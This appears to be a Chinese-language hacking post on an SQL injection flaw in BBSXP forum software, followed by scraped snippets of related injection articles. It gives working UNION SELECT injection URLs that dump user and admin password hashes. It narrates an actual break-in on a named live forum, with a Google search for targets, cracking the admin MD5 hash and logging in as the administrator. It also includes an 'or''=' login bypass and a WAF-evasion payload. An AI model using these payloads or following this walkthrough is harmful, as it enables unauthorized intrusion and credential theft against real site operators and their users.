bbsxp最新漏洞
漏洞日期:2023年7月1日
受害版本:目前所有bbsxp
漏洞利用:
查前台密碼注入語句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查後台密碼注入語句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5
首先開啟.google.com在輸入po......bbsxp5.15有很多這樣的論壇,隨便點個,好就這個bbs.yuntea.com 真幸運,這個站還沒打上補丁,一口做氣殺到底,bbsxp5.15最新漏洞
漏洞主要出在blog.asp 可以讓直接構造資料庫命令
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
後台區長的md5密碼就顯示出來了。
前台密碼也可以出來,
網上已經有相關動畫,軟體。
就利用這個漏洞,肯定有一批bbsxp的**要倒下了
接下來就是講工具了,準備好md5密碼破解器
關於md5的破解,比較好使的有md5cracker速度增強版。
1。先用8位或9位數字跑。很快。
2。如果不行,用小寫字母跑。選擇5-6位比較好。
3。再不行,說明密碼可能使字母加數字,可以碰碰運氣。可以配置乙個精品自典,比如10g的,
跑上及幾個小時。(你的機器配置必須很好)
4。再不行,建議放棄,太**了。
前台ok...後台密碼..(注:你必須知道管理員的帳號)
直接預設的配置就是直接拿下後台密碼...
直接吧前台md5密碼暴出來。
剩下的事就事破解md5了。
現在開始進行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]
他的密碼是7cb2be65eb9f215215a0725a10b6e39e可能前台的密碼和後台一樣,如果有2個加密密碼那就是代表1個是前台的乙個是後台的,不多說了,看操作
按照上面工具的介紹先用數字把,
正在破===耐心等等
我接條資訊,大家不介意把~
出來了,密碼是82246124,登入,,他的帳號是wzwu,密碼82246124,登入成功,後台登入,密碼82246124,登入成功,下面的因該知道把,我也就不多說了,以免遭到人家的痛罵。
bbsxp5.15最新漏洞的原始作者不清
74d2710bd75c06a057e842c8ca55c576
名'or''='密碼也是'or''='
' 一般asp系統都有類似下面的url:http://.***.com/***.asp?id=××,我們只往在這樣的url後加上乙個單引號,如果返回伺服器錯誤資訊,那麼就說明了程式並沒有過濾單引號,而且從返回的錯誤資訊中的了可以得到伺服器的一些相關配置資訊。接著接交http:/.***.com/***.asp?id=××
1=2,如果返回的頁面不一樣,說明頁面可以注入。
KPPW最新版SQL注入漏洞一
kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...
SQL注入漏洞全接觸 簡單介紹篇
隨著b s模式應用開發的發展,使用這種模式編寫應用程式的程式設計師也越來越多。但是由於這個行業的入門門檻不高,程式設計師的水平及經驗也參差不齊,相當大一部分程式設計師在編寫 的時候,沒有對使用者輸入資料的合法性進行判斷,使應用程式存在安全隱患。使用者可以提交一段資料庫查詢 根據程式返回的結果,獲得某...
安全狗最新版V3 3繞過攔截注入漏洞
最新版安全狗的攔截過濾存在問題,導致可以繞過攔截進行注入 對於select from 的攔截可在 select 前後或中間插入 81 ff,即可繞過攔截注入如 id 1 20union 20sel 81ect 201,2 20from 20admin id 1 20union 20select 81...